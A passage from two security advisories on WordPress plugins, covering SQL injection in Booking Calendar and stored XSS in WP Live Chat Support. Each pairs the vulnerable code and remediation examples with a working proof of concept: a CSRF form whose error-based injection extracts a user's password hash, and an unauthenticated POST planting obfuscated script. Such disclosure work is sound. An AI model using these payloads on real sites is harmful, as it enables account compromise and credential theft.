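 * the advisory notes that Editors reach this page, so the code must decide
 * explicitly which role is meant to see bookings.
 */
function bk_listing( array $request ) {
	global $wpdb;
	if ( ! current_user_can( 'edit_others_posts' ) ) { // assumed capability
		return array();
	}
	$sql = 'SELECT bk.* FROM ' . $wpdb->prefix . 'booking AS bk' . bk_listing_where_safe( $request );
	return $wpdb->get_results( $sql );
}

// Constructed input: the proof-of-concept value in shortened form. The
// unsafe builder keeps the whole string; the safe builder keeps only "3".
$poc = array(
	'wh_booking_id' => '3 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(user_pass,FLOOR(RAND(0)*2))x FROM wp_users GROUP BY x)a)',
);
echo bk_listing_where_unsafe( $poc ), "\n";
echo bk_listing_where_safe( $poc ), "\n";
```

Parameterising the query fixes the injection; it does not fix the
missing nonce, which still lets a third-party page submit the filter on
a logged-in user's behalf. Both checks belong in the handler.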

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept shows the hashed password of the first
user. The injected subquery is the MySQL error-based technique: GROUP BY
on a value derived from FLOOR(RAND(0)*2) causes a duplicate-key error,
and the error message quotes the offending key, which here is the
password hash wrapped in the markers 'qvbbq' (0x7176626271) and 'qzxzq'
(0x717a787a71). MID(..., 1, 54) keeps the extracted chunk short enough
to fit in that error message, so it only works when the database error
is echoed in the response. The payload also hard-codes the database name
'wordpress' and the table prefix 'wp_'; adjust these to the target.

<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing" method="POST">
			<input type="hidden" name="wh&#95;booking&#95;id" value="3 AND (SELECT 5283 FROM(SELECT COUNT(*),CONCAT(0x7176626271,(SELECT MID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/sql_injection_vulnerability_in_booking_calendar_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/booking/
[4] https://downloads.wordpress.org/plugin/booking.zip
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in WP Live Chat Support
WordPress Plugin
------------------------------------------------------------------------
Dennis Kerdijk <dennis.at.securelabs.nl> & Erwin Kievith
<erwin.at.securelabs.nl>, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the WP Live
Chat Support WordPress Plugin. This issue can be exploited by an
unauthenticated user. It allows an attacker to perform a wide variety of
actions, such as stealing users' session tokens, or performing arbitrary
actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0010

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Live Chat Support [2] WordPress
Plugin version 6.2.03.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP Live Chat Support version 6.2.04 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WP Live Chat Support [2] allows chatting with visitors of a WordPress
site. A stored Cross-Site Scripting vulnerability was found in the WP
Live Chat Support WordPress Plugin. This issue can be exploited by an
unauthenticated user. It allows an attacker to perform a wide variety of
actions, such as stealing users' session tokens, or performing arbitrary
actions on their behalf, once a logged on WordPress user views the
stored payload.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the file wp-live-chat-support/functions.php
(line 1233), where wplc_store_offline_message() inserts the unsanitized
offline message into the database. That function is called from
wp-live-chat-support/wp-live-chat-support.php (line 602) with the raw
POST parameters:

wp-live-chat-support/wp-live-chat-support.php:

600         if ($_POST['action'] == "wplc_user_send_offline_message") {
601             if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }
602             if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }
603             do_action("wplc_hook_offline_message",array(
604               "cid"=>$_POST['cid'],
605               "name"=>$_POST['name'],
606               "email"=>$_POST['email'],
607               "url"=>get_site_url(),
608               "msg"=>$_POST['msg']
609               )
610             );
611         }

wp-live-chat-support/functions.php:

1206 function wplc_store_offline_message($name, $email, $message){
1207     global $wpdb;
1208     global $wplc_tblname_offline_msgs;
1209 
1210     $wplc_settings = get_option('WPLC_SETTINGS');
1211 
1212     if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){
1213         if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {
1214             $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];
1215         } else {
1216             $ip_address = $_SERVER['REMOTE_ADDR'];
1217         }
1218         $offline_ip_address = $ip_address;
1219     } else {
1220         $offline_ip_address = "";
1221     }
1222 
1223 
1224     $ins_array = array(
1225         'timestamp' => current_time('mysql'),
1226         'name' => $name,
1227         'email' => $email,
1228         'message' => $message,
1229         'ip' => $offline_ip_address,
1230         'user_agent' => $_SERVER['HTTP_USER_AGENT']
1231     );
1232 
1233     $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );
1234     return;
1235 }

The vulnerability can be exploited with a specially crafted POST request
to admin-ajax.php; no authentication is needed. The payload fires when
an administrator views the WP Live Chat Offline Messages page. The
offline message functionality is available even when a chat operator is
logged on. Note that the ip and user_agent columns are filled from
request headers (X-Forwarded-For and User-Agent) just as verbatim as
name, email and message, so they are attacker-controlled as well and
need the same treatment wherever they are displayed. Two remarks on the
proof of concept below: the String.fromCharCode sequences decode to
alert("XSS in name!"); and alert("XSS in msg!");, and the security value
is a WordPress nonce, which is bound to the installation and to the
current time window, so the value shown will not be valid elsewhere. A
current one has to be obtained from the target, where it is available
to unauthenticated visitors (otherwise the issue could not be exploited
without authentication as stated above).
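
What the storing side should do with data arriving from an
unauthenticated endpoint, and how to record a client address without
trusting a header any client can set, as an added example that is not
the plugin's code. It runs inside WordPress ($wpdb and the sanitize_*
and esc_* helpers are the WordPress API); the trusted proxy address is
an assumption and the table variable name follows the advisory's
snippet.

```php
<?php
// Added example, not code from the WP Live Chat Support plugin. Runs inside
// WordPress; the proxy address is assumed and should be replaced by the
// address of the site's own reverse proxy, if any.

const WPLC_TRUSTED_PROXIES = array( '10.0.0.5' ); // assumed

/**
 * Client address for the audit column. X-Forwarded-For is a request header
 * that any client can set, so it is only honoured when the TCP peer is one
 * of our own proxies; then the rightmost entry (the one that proxy
 * appended) is used, and it still has to parse as an IP address.
 */
function wplc_client_ip( array $server, array $trusted_proxies ): string {
	$remote = $server['REMOTE_ADDR'] ?? '';
	if ( in_array( $remote, $trusted_proxies, true ) && ! empty( $server['HTTP_X_FORWARDED_FOR'] ) ) {
		$chain     = array_map( 'trim', explode( ',', $server['HTTP_X_FORWARDED_FOR'] ) );
		$candidate = end( $chain );
		if ( false !== filter_var( $candidate, FILTER_VALIDATE_IP ) ) {
			return $candidate;
		}
	}
	return false !== filter_var( $remote, FILTER_VALIDATE_IP ) ? $remote : '';
}

/** Same insert as the vulnerable function, with every untrusted field normalised first. */
function wplc_store_offline_message_safe( string $name, string $email, string $message ): void {
	global $wpdb, $wplc_tblname_offline_msgs;
	$wpdb->insert(
		$wplc_tblname_offline_msgs,
		array(
			'timestamp'  => current_time( 'mysql' ),
			'name'       => sanitize_text_field( $name ),        // strips tags, line breaks, control octets
			'email'      => sanitize_email( $email ),            // keeps only characters allowed in an address
			'message'    => sanitize_textarea_field( $message ), // as sanitize_text_field but keeps newlines (WP 4.7+)
			'ip'         => wplc_client_ip( $_SERVER, WPLC_TRUSTED_PROXIES ),
			'user_agent' => sanitize_text_field( $_SERVER['HTTP_USER_AGENT'] ?? '' ),
		),
		array( '%s', '%s', '%s', '%s', '%s', '%s' )
	);
}

/** The Offline Messages page escapes at output; that, not input filtering, is what closes the XSS. */
function wplc_offline_row( $row ): string {
	return '<tr><td>' . esc_html( $row->name ) . '</td><td>' . esc_html( $row->email ) . '</td>'
		. '<td>' . esc_html( $row->message ) . '</td><td>' . esc_html( $row->ip ) . '</td>'
		. '<td>' . esc_html( $row->user_agent ) . '</td></tr>';
}
```

Input normalisation here is defence in depth and also keeps the e-mail
that wplc_send_offline_msg() builds from the same fields clean; the
Offline Messages page must still escape every column when it renders
the rows, because that is where the stored payload executes.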

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 361
Connection: close

action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_wp_live_chat_support_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-live-chat-support/
[3] https://downloads.wordpress.org/plugin/wp-live-chat-support.zip
